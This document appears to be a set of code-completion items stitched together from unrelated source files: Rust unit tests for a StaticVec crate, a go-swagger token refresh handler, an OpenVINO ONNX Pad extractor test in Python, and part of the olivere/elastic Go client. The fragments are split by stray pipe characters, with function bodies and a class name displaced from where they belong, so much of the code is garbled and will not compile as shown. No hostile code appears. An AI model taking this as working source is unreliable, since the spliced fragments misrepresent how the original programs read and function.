io::IoSliceMut::new(&mut buf5),
io::IoSliceMut::new(&mut buf6),
];
assert_eq!(ints2.read_vectored(&mut bufs2).unwrap(), 9);
assert_eq!("[[1, 2], [3, 4, 5], [6, 7, 8, 9]]", format!("{:?}", bufs2));
assert_eq!(ints2, [10, 11, 12]);
}
#[test]
fn bufread() {
let mut cursor = StaticVec::<u8, 7>::from("foo\nbar".as_bytes());
let mut buf = String::new();
let num_bytes = cursor
.read_line(&mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 4);
assert_eq!(buf, "foo\n");
buf.clear();
let num_bytes = cursor
.read_line(&mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 3);
assert_eq!(buf, "bar");
buf.clear();
let num_bytes = cursor
.read_line(&mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 0);
assert_eq!(buf, "");
let cursor2 = StaticVec::<u8, 18>::from("lorem\nipsum\r\ndolor".as_bytes());
let mut lines_iter = cursor2.lines().map(|l| l.unwrap());
assert_eq!(lines_iter.next(), Some(String::from("lorem")));
assert_eq!(lines_iter.next(), Some(String::from("ipsum")));
assert_eq!(lines_iter.next(), Some(String::from("dolor")));
assert_eq!(lines_iter.next(), None);
let mut cursor3 = StaticVec::<u8, 11>::from("lorem-ipsum".as_bytes());
let mut buf = vec![];
let num_bytes = cursor3
.read_until(b'-', &mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 6);
assert_eq!(buf, b"lorem-");
buf.clear();
let num_bytes = cursor3
.read_until(b'-', &mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 5);
assert_eq!(buf, b"ipsum");
buf.clear();
let num_bytes = cursor3
.read_until(b'-', &mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 0);
assert_eq!(buf, b"");
let cursor4 = StaticVec::<u8, 17>::from("lorem-ipsum-dolor".as_bytes());
let mut split_iter = cursor4.split(b'-').map(|l| l.unwrap());
assert_eq!(split_iter.next(), Some(b"lorem".to_vec()));
assert_eq!(split_iter.next(), Some(b"ipsum".to_vec()));
assert_eq!(split_iter.next(), Some(b"dolor".to_vec()));
assert_eq!(split_iter.next(), None);
}
}
#[test]
fn remaining_capacity() {
let mut v = StaticVec::<i32, 3>::new();
v.push(12);
assert_eq!(v.remaining_capacity(), 2);
}
#[test]
fn remove() {
let mut v = staticvec![1, 2, 3];
assert_eq!(v.remove(1), 2);
assert_eq!(v, [1, 3]);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn remove_panic() {
let mut v = staticvec![1, 2, 3];
v.remove(128);
}
#[test]
fn remove_item() {
let mut vec = staticvec![1, 2, 3, 1];
vec.remove_item(&1);
assert_eq!(vec, staticvec![2, 3, 1]);
}
#[test]
fn retain() {
let mut vec = staticvec![1, 2, 3, 4, 5];
let keep = [false, true, true, false, true];
let mut i = 0;
vec.retain(|_| (keep[i], i += 1).0);
assert_eq!(vec, [2, 3, 5]);
}
#[test]
fn reversed() {
let v = staticvec![1, 2, 3].reversed();
assert!(v == [3, 2, 1]);
let mut x = StaticVec::<f64, 24>::new();
let mut y = StaticVec::<f64, 12>::new();
for _ in 0..12 {
y.push(12.0);
}
x.append(&mut y);
assert_eq!(x.reversed().len(), 12);
assert_eq!(
x.reversed(),
[12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0]
);
}
#[test]
fn size_in_bytes() {
let x = StaticVec::<u8, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(x.size_in_bytes(), 8);
let y = StaticVec::<u16, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(y.size_in_bytes(), 16);
let z = StaticVec::<u32, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(z.size_in_bytes(), 32);
let w = StaticVec::<u64, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(w.size_in_bytes(), 64);
}
#[test]
fn set_len() {
let mut v = staticvec![1, 2, 3];
assert_eq!(v.len(), 3);
unsafe { v.set_len(0) };
assert_eq!(v.len(), 0);
}
#[cfg(feature = "std")]
#[test]
fn sorted() {
const V: StaticVec<StaticVec<i32, 3>, 2> = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
assert_eq!(
V.iter().flatten().collect::<StaticVec<i32, 6>>().sorted(),
[1, 2, 3, 4, 5, 6]
);
let v2 = StaticVec::<i32, 128>::new();
assert_eq!(v2.sorted(), []);
assert_eq!(staticvec![2, 1].sorted(), [1, 2]);
}
#[test]
fn sorted_unstable() {
const V: StaticVec<StaticVec<i32, 3>, 2> = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
assert_eq!(
V.iter()
.flatten()
.collect::<StaticVec<i32, 6>>()
.sorted_unstable(),
[1, 2, 3, 4, 5, 6]
);
let v2 = StaticVec::<i32, 128>::new();
assert_eq!(v2.sorted_unstable(), []);
assert_eq!(staticvec![2, 1].sorted_unstable(), [1, 2]);
}
#[test]
fn split_off() {
let mut vec = staticvec![1, 2, 3];
let vec2 = vec.split_off(1);
assert_eq!(vec, [1]);
assert_eq!(vec2, [2, 3]);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn split_off_assert() {
let mut vec3 = StaticVec::<i32, 0>::new();
assert_eq!(vec3.split_off(9000), []);
}
/*
#[test]
fn symmetric_difference() {
assert_eq!(
staticvec![1, 2, 3].symmetric_difference(&staticvec![3, 4, 5]),
[1, 2, 4, 5]
);
assert_eq!(
staticvec![501, 502, 503, 504].symmetric_difference(&staticvec![502, 503, 504, 505]),
[501, 505]
);
}
*/
#[test]
fn swap_pop() {
let mut v = staticvec!["foo", "bar", "baz", "qux"];
assert_eq!(v.swap_pop(1).unwrap(), "bar");
assert_eq!(v, ["foo", "qux", "baz"]);
assert_eq!(v.swap_pop(0).unwrap(), "foo");
assert_eq!(v, ["baz", "qux"]);
assert_eq!(v.swap_pop(17), None);
}
#[test]
fn swap_remove() {
let mut v = staticvec!["foo", "bar", "baz", "qux"];
assert_eq!(v.swap_remove(1), "bar");
assert_eq!(v, ["foo", "qux", "baz"]);
assert_eq!(v.swap_remove(0), "foo");
assert_eq!(v, ["baz", "qux"]);
}
#[test]
fn triple() {
static V: StaticVec<usize, 4> = staticvec![4, 5, 6, 7];
assert_eq!(V.triple(), (V.as_ptr(), 4, 4));
}
#[test]
fn triple_mut() {
let mut v = staticvec![4, 5, 6, 7];
let t = v.triple_mut();
assert_eq!(t, (v.as_mut_ptr(), 4, 4));
unsafe { *t.0 = 8 };
assert_eq!(v, [8, 5, 6, 7]);
}
#[test]
fn truncate() {
let mut vec = staticvec![1, 2, 3, 4, 5];
vec.truncate(2);
assert_eq!(vec, [1, 2]);
let mut vec2 = staticvec![1, 2, 3, 4, 5];
vec2.truncate(2);
assert_eq!(vec2, [1, 2]);
let mut vec3 = staticvec![1, 2, 3];
vec3.truncate(0);
assert_eq!(vec3, []);
let mut vec4 = staticvec![1, 2, 3, 4];
vec4.truncate(97);
assert_eq!(vec4.len(), 4);
}
#[test]
fn try_extend_from_slice() {
let mut v = StaticVec::<i32, 3>::from([1, 2, 3]);
assert_eq!(v.try_extend_from_slice(&[2, 3]), Err(CapacityError::<3> {}));
let mut w = StaticVec::<i32, 4>::from([1, 2, 3]);
assert_eq!(w.try_extend_from_slice(&[2]), Ok(()));
}
#[allow(unused_must_use)]
#[test]
fn try_insert() {
let mut vec = staticvec![1, 2, 3, 4, 5];
assert_eq!(vec.try_insert(2, 0), Err(CapacityError::<5> {}));
let mut vec2 = StaticVec::<i32, 4>::new_from_slice(&[1, 2, 3]);
vec2.try_insert(2, 3);
assert_eq!(vec2, [1, 2, 3, 3]);
}
#[test]
fn try_push() {
let mut vec = staticvec![1, 2, 3, 4, 5];
let err = vec.try_push(2).unwrap_err();
assert_eq!(err.into_value(), 2);
let mut vec2 = StaticVec::<i32, 4>::new_from_slice(&[1, 2, 3]);
assert_eq!(vec2.try_push(3), Ok(()));
assert_eq!(vec2, [1, 2, 3, 3]);
}
/*
#[test]
fn union() {
assert_eq!(
staticvec![1, 2, 3].union(&staticvec![4, 2, 3, 4]),
[1, 2, 3, 4],
);
}
*/
#[cfg(feature = "std")]
mod write_tests {
use staticvec::*;
use std::io::{IoSlice, Write};
#[test]
fn write() {
// From arrayvec
let mut v = StaticVec::<u8, 8>::new();
write!(&mut v, "\x01\x02\x03").unwrap();
assert_eq!(&v[..], &[1, 2, 3]);
let r = v.write(&[9; 16]).unwrap();
assert_eq!(r, 5);
assert_eq!(&v[..], &[1, 2, 3, 9, 9, 9, 9, 9]);
}
#[test]
fn write_all() {
let mut v = StaticVec::<u8, 6>::new();
assert!(v.write_all(&[1, 2, 3, 4, 5, 6, 7, 8]).is_err());
v.clear();
assert!(v.write_all(&[1, 2, 3, 4, 5, 6]).is_ok());
}
#[test]
fn write_vectored() {
let mut v = StaticVec::<u8, 8>::new();
assert_eq!(
v.write_vectored(&[IoSlice::new(&[1, 2, 3, 4]), IoSlice::new(&[5, 6, 7, 8])])
.unwrap(),
8
);
assert_eq!(v, [1, 2, 3, 4, 5, 6, 7, 8]);
let mut v2 = StaticVec::<u8, 4>::new();
assert_eq!(
v2.write_vectored(&[IoSlice::new(&[1, 2, 3, 4]), IoSlice::new(&[5, 6, 7, 8])])
.unwrap(),
4
);
assert_eq!(v2, [1, 2, 3, 4]);
}
} | assert_eq!(i4.nth(0).unwrap(), &4);
assert_eq!(i4.nth(0), None);
assert_eq!(i4.nth(0), None); |
token_refresh.go | // Code generated by go-swagger; DO NOT EDIT.
package authentication
// This file was generated by the swagger tool.
// Editing this file might prove futile when you re-run the generate command
import (
"net/http"
"github.com/go-openapi/runtime/middleware"
)
// TokenRefreshHandlerFunc turns a function with the right signature into a token refresh handler
type TokenRefreshHandlerFunc func(TokenRefreshParams) middleware.Responder
// Handle executing the request and returning a response
func (fn TokenRefreshHandlerFunc) Handle(params TokenRefreshParams) middleware.Responder {
return fn(params)
}
// TokenRefreshHandler interface for that can handle valid token refresh params
type TokenRefreshHandler interface {
Handle(TokenRefreshParams) middleware.Responder
}
// NewTokenRefresh creates a new http.Handler for the token refresh operation
func NewTokenRefresh(ctx *middleware.Context, handler TokenRefreshHandler) *TokenRefresh |
/* TokenRefresh swagger:route GET /auth/token/refresh Authentication tokenRefresh
Refresh token
Refresh expired token.
*/
type TokenRefresh struct {
Context *middleware.Context
Handler TokenRefreshHandler
}
func (o *TokenRefresh) ServeHTTP(rw http.ResponseWriter, r *http.Request) {
route, rCtx, _ := o.Context.RouteInfo(r)
if rCtx != nil {
*r = *rCtx
}
var Params = NewTokenRefreshParams()
if err := o.Context.BindValidRequest(r, route, &Params); err != nil { // bind params
o.Context.Respond(rw, r, route.Produces, route, err)
return
}
res := o.Handler.Handle(Params) // actually handle the request
o.Context.Respond(rw, r, route.Produces, route, res)
}
| {
return &TokenRefresh{Context: ctx, Handler: handler}
} |
pad_ext_test.py | """
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import Namespace
import onnx
from extensions.front.onnx.pad_ext import PadFrontExtractor
from mo.graph.graph import Graph
from mo.utils.unittest.extractors import PB, BaseExtractorsTestingClass
class | (BaseExtractorsTestingClass):
@staticmethod
def _create_node(pads=None, value=None, mode=None):
if pads is None:
pads = [1, 2, 3, 4]
if value is None:
value = 0.0
if mode is None:
mode = 'constant'
pb = onnx.helper.make_node(
'Pad',
pads=pads,
mode=mode,
value=value,
inputs=['a'],
outputs=['b']
)
graph = Graph()
node = PB({'pb': pb, 'graph': graph})
return node
def test_ok(self):
node = self._create_node()
PadFrontExtractor.extract(node)
self.res = node
self.expected = {
'pads': [[1, 3], [2, 4]],
'mode': 'constant',
'fill_value': 0
}
self.compare()
def test_reflect(self):
node = self._create_node(mode='reflect')
PadFrontExtractor.extract(node)
self.res = node
self.expected = {
'pads': [[1, 3], [2, 4]],
'mode': 'reflect',
'fill_value': 0
}
self.compare()
def test_non_zero_fill_value(self):
node = self._create_node(value=1.0)
PadFrontExtractor.extract(node)
self.res = node
self.expected = {
'pads': [[1, 3], [2, 4]],
'mode': 'constant',
'fill_value': 1.0
}
self.compare()
| TestPad |
client.go | // Copyright 2012-present Oliver Eilhard. All rights reserved.
// Use of this source code is governed by a MIT-license.
// See http://olivere.mit-license.org/license.txt for details.
package elastic
import (
"bytes"
"context"
"encoding/json"
"fmt"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os"
"strings"
"sync"
"time"
"github.com/pkg/errors"
"github.com/olivere/elastic/v7/config"
)
const (
// Version is the current version of Elastic.
Version = "7.0.12"
// DefaultURL is the default endpoint of Elasticsearch on the local machine.
// It is used e.g. when initializing a new Client without a specific URL.
DefaultURL = "http://127.0.0.1:9200"
// DefaultScheme is the default protocol scheme to use when sniffing
// the Elasticsearch cluster.
DefaultScheme = "http"
// DefaultHealthcheckEnabled specifies if healthchecks are enabled by default.
DefaultHealthcheckEnabled = true
// DefaultHealthcheckTimeoutStartup is the time the healthcheck waits
// for a response from Elasticsearch on startup, i.e. when creating a
// client. After the client is started, a shorter timeout is commonly used
// (its default is specified in DefaultHealthcheckTimeout).
DefaultHealthcheckTimeoutStartup = 5 * time.Second
// DefaultHealthcheckTimeout specifies the time a running client waits for
// a response from Elasticsearch. Notice that the healthcheck timeout
// when a client is created is larger by default (see DefaultHealthcheckTimeoutStartup).
DefaultHealthcheckTimeout = 1 * time.Second
// DefaultHealthcheckInterval is the default interval between
// two health checks of the nodes in the cluster.
DefaultHealthcheckInterval = 60 * time.Second
// DefaultSnifferEnabled specifies if the sniffer is enabled by default.
DefaultSnifferEnabled = true
// DefaultSnifferInterval is the interval between two sniffing procedures,
// i.e. the lookup of all nodes in the cluster and their addition/removal
// from the list of actual connections.
DefaultSnifferInterval = 15 * time.Minute
// DefaultSnifferTimeoutStartup is the default timeout for the sniffing
// process that is initiated while creating a new client. For subsequent
// sniffing processes, DefaultSnifferTimeout is used (by default).
DefaultSnifferTimeoutStartup = 5 * time.Second
// DefaultSnifferTimeout is the default timeout after which the
// sniffing process times out. Notice that for the initial sniffing
// process, DefaultSnifferTimeoutStartup is used.
DefaultSnifferTimeout = 2 * time.Second
// DefaultSendGetBodyAs is the HTTP method to use when elastic is sending
// a GET request with a body.
DefaultSendGetBodyAs = "GET"
// DefaultGzipEnabled specifies if gzip compression is enabled by default.
DefaultGzipEnabled = false
// off is used to disable timeouts.
off = -1 * time.Second
)
var (
// ErrNoClient is raised when no Elasticsearch node is available.
ErrNoClient = errors.New("no Elasticsearch node available")
// ErrRetry is raised when a request cannot be executed after the configured
// number of retries.
ErrRetry = errors.New("cannot connect after several retries")
// ErrTimeout is raised when a request timed out, e.g. when WaitForStatus
// didn't return in time.
ErrTimeout = errors.New("timeout")
// noRetries is a retrier that does not retry.
noRetries = NewStopRetrier()
// noDeprecationLog is a no-op for logging deprecations.
noDeprecationLog = func(*http.Request, *http.Response) {}
)
// Doer is an interface to perform HTTP requests.
// It can be used for mocking.
type Doer interface {
Do(*http.Request) (*http.Response, error)
}
// ClientOptionFunc is a function that configures a Client.
// It is used in NewClient.
type ClientOptionFunc func(*Client) error
// Client is an Elasticsearch client. Create one by calling NewClient.
type Client struct {
c Doer // e.g. a net/*http.Client to use for requests
connsMu sync.RWMutex // connsMu guards the next block
conns []*conn // all connections
cindex int // index into conns
mu sync.RWMutex // guards the next block
urls []string // set of URLs passed initially to the client
running bool // true if the client's background processes are running
errorlog Logger // error log for critical messages
infolog Logger // information log for e.g. response times
tracelog Logger // trace log for debugging
deprecationlog func(*http.Request, *http.Response)
scheme string // http or https
healthcheckEnabled bool // healthchecks enabled or disabled
healthcheckTimeoutStartup time.Duration // time the healthcheck waits for a response from Elasticsearch on startup
healthcheckTimeout time.Duration // time the healthcheck waits for a response from Elasticsearch
healthcheckInterval time.Duration // interval between healthchecks
healthcheckStop chan bool // notify healthchecker to stop, and notify back
snifferEnabled bool // sniffer enabled or disabled
snifferTimeoutStartup time.Duration // time the sniffer waits for a response from nodes info API on startup
snifferTimeout time.Duration // time the sniffer waits for a response from nodes info API
snifferInterval time.Duration // interval between sniffing
snifferCallback SnifferCallback // callback to modify the sniffing decision
snifferStop chan bool // notify sniffer to stop, and notify back
decoder Decoder // used to decode data sent from Elasticsearch
basicAuth bool // indicates whether to send HTTP Basic Auth credentials
basicAuthUsername string // username for HTTP Basic Auth
basicAuthPassword string // password for HTTP Basic Auth
sendGetBodyAs string // override for when sending a GET with a body
gzipEnabled bool // gzip compression enabled or disabled (default)
requiredPlugins []string // list of required plugins
retrier Retrier // strategy for retries
headers http.Header // a list of default headers to add to each request
}
// NewClient creates a new client to work with Elasticsearch.
//
// NewClient, by default, is meant to be long-lived and shared across
// your application. If you need a short-lived client, e.g. for request-scope,
// consider using NewSimpleClient instead.
//
// The caller can configure the new client by passing configuration options
// to the func.
//
// Example:
//
// client, err := elastic.NewClient(
// elastic.SetURL("http://127.0.0.1:9200", "http://127.0.0.1:9201"),
// elastic.SetBasicAuth("user", "secret"))
//
// If no URL is configured, Elastic uses DefaultURL by default.
//
// If the sniffer is enabled (the default), the new client then sniffes
// the cluster via the Nodes Info API
// (see https://www.elastic.co/guide/en/elasticsearch/reference/7.0/cluster-nodes-info.html#cluster-nodes-info).
// It uses the URLs specified by the caller. The caller is responsible
// to only pass a list of URLs of nodes that belong to the same cluster.
// This sniffing process is run on startup and periodically.
// Use SnifferInterval to set the interval between two sniffs (default is
// 15 minutes). In other words: By default, the client will find new nodes
// in the cluster and remove those that are no longer available every
// 15 minutes. Disable the sniffer by passing SetSniff(false) to NewClient.
//
// The list of nodes found in the sniffing process will be used to make
// connections to the REST API of Elasticsearch. These nodes are also
// periodically checked in a shorter time frame. This process is called
// a health check. By default, a health check is done every 60 seconds.
// You can set a shorter or longer interval by SetHealthcheckInterval.
// Disabling health checks is not recommended, but can be done by
// SetHealthcheck(false).
//
// Connections are automatically marked as dead or healthy while
// making requests to Elasticsearch. When a request fails, Elastic will
// call into the Retry strategy which can be specified with SetRetry.
// The Retry strategy is also responsible for handling backoff i.e. the time
// to wait before starting the next request. There are various standard
// backoff implementations, e.g. ExponentialBackoff or SimpleBackoff.
// Retries are disabled by default.
//
// If no HttpClient is configured, then http.DefaultClient is used.
// You can use your own http.Client with some http.Transport for
// advanced scenarios.
//
// An error is also returned when some configuration option is invalid or
// the new client cannot sniff the cluster (if enabled).
func NewClient(options ...ClientOptionFunc) (*Client, error) {
return DialContext(context.Background(), options...)
}
// NewClientFromConfig initializes a client from a configuration.
func NewClientFromConfig(cfg *config.Config) (*Client, error) {
options, err := configToOptions(cfg)
if err != nil {
return nil, err
}
return DialContext(context.Background(), options...)
}
// NewSimpleClient creates a new short-lived Client that can be used in
// use cases where you need e.g. one client per request.
//
// While NewClient by default sets up e.g. periodic health checks
// and sniffing for new nodes in separate goroutines, NewSimpleClient does
// not and is meant as a simple replacement where you don't need all the
// heavy lifting of NewClient.
//
// NewSimpleClient does the following by default: First, all health checks
// are disabled, including timeouts and periodic checks. Second, sniffing
// is disabled, including timeouts and periodic checks. The number of retries
// is set to 1. NewSimpleClient also does not start any goroutines.
//
// Notice that you can still override settings by passing additional options,
// just like with NewClient.
func NewSimpleClient(options ...ClientOptionFunc) (*Client, error) {
c := &Client{
c: http.DefaultClient,
conns: make([]*conn, 0),
cindex: -1,
scheme: DefaultScheme,
decoder: &DefaultDecoder{},
healthcheckEnabled: false,
healthcheckTimeoutStartup: off,
healthcheckTimeout: off,
healthcheckInterval: off,
healthcheckStop: make(chan bool),
snifferEnabled: false,
snifferTimeoutStartup: off,
snifferTimeout: off,
snifferInterval: off,
snifferCallback: nopSnifferCallback,
snifferStop: make(chan bool),
sendGetBodyAs: DefaultSendGetBodyAs,
gzipEnabled: DefaultGzipEnabled,
retrier: noRetries, // no retries by default
deprecationlog: noDeprecationLog,
}
// Run the options on it
for _, option := range options {
if err := option(c); err != nil {
return nil, err
}
}
// Use a default URL and normalize them
if len(c.urls) == 0 {
c.urls = []string{DefaultURL}
}
c.urls = canonicalize(c.urls...)
// If the URLs have auth info, use them here as an alternative to SetBasicAuth
if !c.basicAuth {
for _, urlStr := range c.urls {
u, err := url.Parse(urlStr)
if err == nil && u.User != nil {
c.basicAuth = true
c.basicAuthUsername = u.User.Username()
c.basicAuthPassword, _ = u.User.Password()
break
}
}
}
for _, url := range c.urls {
c.conns = append(c.conns, newConn(url, url))
}
// Ensure that we have at least one connection available
if err := c.mustActiveConn(); err != nil {
return nil, err
}
// Check the required plugins
for _, plugin := range c.requiredPlugins {
found, err := c.HasPlugin(plugin)
if err != nil {
return nil, err
}
if !found {
return nil, fmt.Errorf("elastic: plugin %s not found", plugin)
}
}
c.mu.Lock()
c.running = true
c.mu.Unlock()
return c, nil
}
// Dial will call DialContext with a background context.
func Dial(options ...ClientOptionFunc) (*Client, error) {
return DialContext(context.Background(), options...)
}
// DialContext will connect to Elasticsearch, just like NewClient does.
//
// The context is honoured in terms of e.g. cancellation.
func DialContext(ctx context.Context, options ...ClientOptionFunc) (*Client, error) {
// Set up the client
c := &Client{
c: http.DefaultClient,
conns: make([]*conn, 0),
cindex: -1,
scheme: DefaultScheme,
decoder: &DefaultDecoder{},
healthcheckEnabled: DefaultHealthcheckEnabled,
healthcheckTimeoutStartup: DefaultHealthcheckTimeoutStartup,
healthcheckTimeout: DefaultHealthcheckTimeout,
healthcheckInterval: DefaultHealthcheckInterval,
healthcheckStop: make(chan bool),
snifferEnabled: DefaultSnifferEnabled,
snifferTimeoutStartup: DefaultSnifferTimeoutStartup,
snifferTimeout: DefaultSnifferTimeout,
snifferInterval: DefaultSnifferInterval,
snifferCallback: nopSnifferCallback,
snifferStop: make(chan bool),
sendGetBodyAs: DefaultSendGetBodyAs,
gzipEnabled: DefaultGzipEnabled,
retrier: noRetries, // no retries by default
deprecationlog: noDeprecationLog,
}
// Run the options on it
for _, option := range options {
if err := option(c); err != nil {
return nil, err
}
}
// Use a default URL and normalize them
if len(c.urls) == 0 {
c.urls = []string{DefaultURL}
}
c.urls = canonicalize(c.urls...)
// If the URLs have auth info, use them here as an alternative to SetBasicAuth
if !c.basicAuth {
for _, urlStr := range c.urls {
u, err := url.Parse(urlStr)
if err == nil && u.User != nil {
c.basicAuth = true
c.basicAuthUsername = u.User.Username()
c.basicAuthPassword, _ = u.User.Password()
break
}
}
}
// Check if we can make a request to any of the specified URLs
if c.healthcheckEnabled {
if err := c.startupHealthcheck(ctx, c.healthcheckTimeoutStartup); err != nil {
return nil, err
}
}
if c.snifferEnabled {
// Sniff the cluster initially
if err := c.sniff(ctx, c.snifferTimeoutStartup); err != nil {
return nil, err
}
} else {
// Do not sniff the cluster initially. Use the provided URLs instead.
for _, url := range c.urls {
c.conns = append(c.conns, newConn(url, url))
}
}
if c.healthcheckEnabled {
// Perform an initial health check
c.healthcheck(ctx, c.healthcheckTimeoutStartup, true)
}
// Ensure that we have at least one connection available
if err := c.mustActiveConn(); err != nil {
return nil, err
}
// Check the required plugins
for _, plugin := range c.requiredPlugins {
found, err := c.HasPlugin(plugin)
if err != nil {
return nil, err
}
if !found {
return nil, fmt.Errorf("elastic: plugin %s not found", plugin)
}
}
if c.snifferEnabled {
go c.sniffer() // periodically update cluster information
}
if c.healthcheckEnabled {
go c.healthchecker() // start goroutine periodically ping all nodes of the cluster
}
c.mu.Lock()
c.running = true
c.mu.Unlock()
return c, nil
}
// DialWithConfig will use the configuration settings parsed from config package
// to connect to Elasticsearch.
//
// The context is honoured in terms of e.g. cancellation.
func DialWithConfig(ctx context.Context, cfg *config.Config) (*Client, error) {
options, err := configToOptions(cfg)
if err != nil {
return nil, err
}
return DialContext(ctx, options...)
}
func configToOptions(cfg *config.Config) ([]ClientOptionFunc, error) {
var options []ClientOptionFunc
if cfg != nil {
if cfg.URL != "" {
options = append(options, SetURL(cfg.URL))
}
if cfg.Errorlog != "" {
f, err := os.OpenFile(cfg.Errorlog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, errors.Wrap(err, "unable to initialize error log")
}
l := log.New(f, "", 0)
options = append(options, SetErrorLog(l))
}
if cfg.Tracelog != "" {
f, err := os.OpenFile(cfg.Tracelog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, errors.Wrap(err, "unable to initialize trace log")
}
l := log.New(f, "", 0)
options = append(options, SetTraceLog(l))
}
if cfg.Infolog != "" {
f, err := os.OpenFile(cfg.Infolog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, errors.Wrap(err, "unable to initialize info log")
}
l := log.New(f, "", 0)
options = append(options, SetInfoLog(l))
}
if cfg.Username != "" || cfg.Password != "" {
options = append(options, SetBasicAuth(cfg.Username, cfg.Password))
}
if cfg.Sniff != nil {
options = append(options, SetSniff(*cfg.Sniff))
}
if cfg.Healthcheck != nil {
options = append(options, SetHealthcheck(*cfg.Healthcheck))
}
}
return options, nil
}
// SetHttpClient can be used to specify the http.Client to use when making
// HTTP requests to Elasticsearch.
func SetHttpClient(httpClient Doer) ClientOptionFunc {
return func(c *Client) error {
if httpClient != nil {
c.c = httpClient
} else {
c.c = http.DefaultClient
}
return nil
}
}
// SetBasicAuth can be used to specify the HTTP Basic Auth credentials to
// use when making HTTP requests to Elasticsearch.
func SetBasicAuth(username, password string) ClientOptionFunc |
// SetURL defines the URL endpoints of the Elasticsearch nodes. Notice that
// when sniffing is enabled, these URLs are used to initially sniff the
// cluster on startup.
func SetURL(urls ...string) ClientOptionFunc {
return func(c *Client) error {
switch len(urls) {
case 0:
c.urls = []string{DefaultURL}
default:
c.urls = urls
}
return nil
}
}
// SetScheme sets the HTTP scheme to look for when sniffing (http or https).
// This is http by default.
func SetScheme(scheme string) ClientOptionFunc {
return func(c *Client) error {
c.scheme = scheme
return nil
}
}
// SetSniff enables or disables the sniffer (enabled by default).
func SetSniff(enabled bool) ClientOptionFunc {
return func(c *Client) error {
c.snifferEnabled = enabled
return nil
}
}
// SetSnifferTimeoutStartup sets the timeout for the sniffer that is used
// when creating a new client. The default is 5 seconds. Notice that the
// timeout being used for subsequent sniffing processes is set with
// SetSnifferTimeout.
func SetSnifferTimeoutStartup(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.snifferTimeoutStartup = timeout
return nil
}
}
// SetSnifferTimeout sets the timeout for the sniffer that finds the
// nodes in a cluster. The default is 2 seconds. Notice that the timeout
// used when creating a new client on startup is usually greater and can
// be set with SetSnifferTimeoutStartup.
func SetSnifferTimeout(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.snifferTimeout = timeout
return nil
}
}
// SetSnifferInterval sets the interval between two sniffing processes.
// The default interval is 15 minutes.
func SetSnifferInterval(interval time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.snifferInterval = interval
return nil
}
}
// SnifferCallback defines the protocol for sniffing decisions.
type SnifferCallback func(*NodesInfoNode) bool
// nopSnifferCallback is the default sniffer callback: It accepts
// all nodes the sniffer finds.
var nopSnifferCallback = func(*NodesInfoNode) bool { return true }
// SetSnifferCallback allows the caller to modify sniffer decisions.
// When setting the callback, the given SnifferCallback is called for
// each (healthy) node found during the sniffing process.
// If the callback returns false, the node is ignored: No requests
// are routed to it.
func SetSnifferCallback(f SnifferCallback) ClientOptionFunc {
return func(c *Client) error {
if f != nil {
c.snifferCallback = f
}
return nil
}
}
// SetHealthcheck enables or disables healthchecks (enabled by default).
func SetHealthcheck(enabled bool) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckEnabled = enabled
return nil
}
}
// SetHealthcheckTimeoutStartup sets the timeout for the initial health check.
// The default timeout is 5 seconds (see DefaultHealthcheckTimeoutStartup).
// Notice that timeouts for subsequent health checks can be modified with
// SetHealthcheckTimeout.
func SetHealthcheckTimeoutStartup(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckTimeoutStartup = timeout
return nil
}
}
// SetHealthcheckTimeout sets the timeout for periodic health checks.
// The default timeout is 1 second (see DefaultHealthcheckTimeout).
// Notice that a different (usually larger) timeout is used for the initial
// healthcheck, which is initiated while creating a new client.
// The startup timeout can be modified with SetHealthcheckTimeoutStartup.
func SetHealthcheckTimeout(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckTimeout = timeout
return nil
}
}
// SetHealthcheckInterval sets the interval between two health checks.
// The default interval is 60 seconds.
func SetHealthcheckInterval(interval time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckInterval = interval
return nil
}
}
// SetMaxRetries sets the maximum number of retries before giving up when
// performing a HTTP request to Elasticsearch.
//
// Deprecated: Replace with a Retry implementation.
func SetMaxRetries(maxRetries int) ClientOptionFunc {
return func(c *Client) error {
if maxRetries < 0 {
return errors.New("MaxRetries must be greater than or equal to 0")
} else if maxRetries == 0 {
c.retrier = noRetries
} else {
// Create a Retrier that will wait for 100ms (+/- jitter) between requests.
// This resembles the old behavior with maxRetries.
ticks := make([]int, maxRetries)
for i := 0; i < len(ticks); i++ {
ticks[i] = 100
}
backoff := NewSimpleBackoff(ticks...)
c.retrier = NewBackoffRetrier(backoff)
}
return nil
}
}
// SetGzip enables or disables gzip compression (disabled by default).
func SetGzip(enabled bool) ClientOptionFunc {
